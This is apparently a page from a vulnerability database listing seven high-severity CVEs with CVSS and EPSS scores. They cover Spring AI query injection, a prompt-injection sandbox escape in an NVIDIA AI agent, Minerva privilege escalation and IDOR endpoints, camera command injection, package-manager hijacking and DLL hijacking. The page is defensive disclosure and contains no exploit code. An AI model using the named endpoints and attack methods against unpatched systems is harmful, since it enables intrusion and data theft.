CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-40967 HIGH PATCH GHSA This Week

Filter expression injection in Spring AI 1.0.0-1.0.5 and 1.1.0-1.1.4 allows remote unauthenticated attackers to manipulate vector store queries through unescaped keys and values in FilterExpressionConverter implementations. The vulnerability enables query language injection across multiple vector database backends, potentially exposing sensitive data (CVSS:C:H) and modifying query results (CVSS:I:L). VMware has released patches in versions 1.0.6 and 1.1.5. No active exploitation confirmed (not in CISA KEV), but the network-accessible attack vector (AV:N/AC:L/PR:N) and code injection classification (CWE-94) indicate significant risk for applications processing untrusted filter expressions.

Java Code Injection RCE
NVD
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-24222 HIGH This Week

Remote unauthenticated attackers can exfiltrate sensitive host environment variables from NVIDIA NeMoClaw by injecting malicious prompts that bypass sandbox access controls. The vulnerability affects the sandbox initialization component and enables information disclosure without requiring any authentication or user interaction (CVSS 8.6, AV:N/AC:L/PR:N/UI:N). Cross-scope impact (S:C) indicates the attack breaks out of the intended sandbox boundary to access host-level secrets. EPSS and KEV status not available; this appears to be a recently disclosed AI/LLM agent security issue.

Information Disclosure Nvidia
NVD
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-5781 HIGH This Week

Privilege escalation in MphRx Minerva V3.6.0 allows authenticated users with user modification privileges to gain administrator access by manipulating the 'identifier' field in direct HTTP requests to the '/minerva/moUser/update' endpoint. While the vulnerability requires existing low-level authenticated access and cannot be exploited through the graphical interface, the CVSS v4.0 score of 8.5 reflects high impact across confidentiality, integrity, and availability in the subsequent system context (SC:H/SI:H/SA:H). No public exploit identified at time of analysis, with EPSS data unavailable for this recent CVE.

Authentication Bypass Minerva
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-5780 HIGH This Week

Insecure direct object reference in MphRx Minerva V3.6.0 allows authenticated attackers to enumerate and exfiltrate sensitive user data across the entire application by manipulating user IDs in the '/minerva/moUser/show/' endpoint. The CVSS 4.0 score of 8.5 reflects high confidentiality impact to both vulnerable (VC:H) and subsequent (SC:H) systems, with subsequent high integrity (SI:H) and availability (SA:H) impacts indicating potential for lateral movement or privilege escalation after initial data disclosure. Coordinated disclosure by INCIBE-CERT suggests vendor notification occurred, though no public exploit code is currently identified and EPSS/KEV data are unavailable for this 2026 CVE.

Authentication Bypass Minerva
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2024-54012 HIGH PATCH This Week

Penetration Testing engineers at Amazon discovered a vulnerability where the camera system failed to properly validate input, allowing specially crafted requests containing malicious commands to be. Rated high severity (CVSS 8.5), this vulnerability is low attack complexity. This OS Command Injection vulnerability could allow attackers to execute arbitrary operating system commands on the host.

Command Injection Qnd 8080R
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-41387 HIGH PATCH GHSA This Week

OpenClaw package manager allows supply chain attacks through incomplete environment variable sanitization before version 2026.3.22. Attackers can hijack approved package installation or execution requests by injecting environment variables that redirect package resolution to malicious infrastructure, enabling trojanized code execution with high impact to confidentiality, integrity, and availability. This requires local access and user interaction to trigger package manager operations, limiting remote exploitation but creating significant insider threat and social engineering risk vectors.

Information Disclosure Openclaw
NVD GitHub
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-7279 HIGH This Week

Local privilege escalation in eMPIA Technology AVACAST allows authenticated local users to execute arbitrary code with SYSTEM privileges by placing a malicious DLL in a specific directory exploited during application startup. This DLL hijacking vulnerability (CWE-427) requires low-complexity exploitation with no user interaction once local access is obtained. Taiwan's TWCERT issued advisories on this vulnerability, indicating regional awareness though no CISA KEV listing or public exploit code has been identified at time of analysis.

RCE Avacast
NVD
CVSS 4.0
8.5
EPSS
0.0%
Page 1 of 3 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy